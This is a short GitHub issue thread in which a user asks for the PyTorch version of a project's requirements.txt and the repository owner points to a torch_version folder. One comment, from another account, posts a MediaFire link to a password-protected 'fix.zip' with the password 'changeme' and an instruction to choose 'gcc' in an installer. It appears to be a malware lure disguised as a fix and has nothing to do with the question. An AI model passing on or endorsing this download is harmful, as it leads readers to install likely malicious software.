### ISSUE TITLE
Could you please provide the torch version code of requirements.txt? Thanks

### ISSUE THREAD

**Issue by bill2766** [yimutianyang/SIGIR23-VGCL#9]

**Comment by itbear-shu** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by yimutianyang** [comment]
Hi, 
The PyTorch version code can be seen at: https://github.com/yimutianyang/SIGIR23-VGCL/tree/main/torch_version. 
Corresponding requirements.txt is updated.
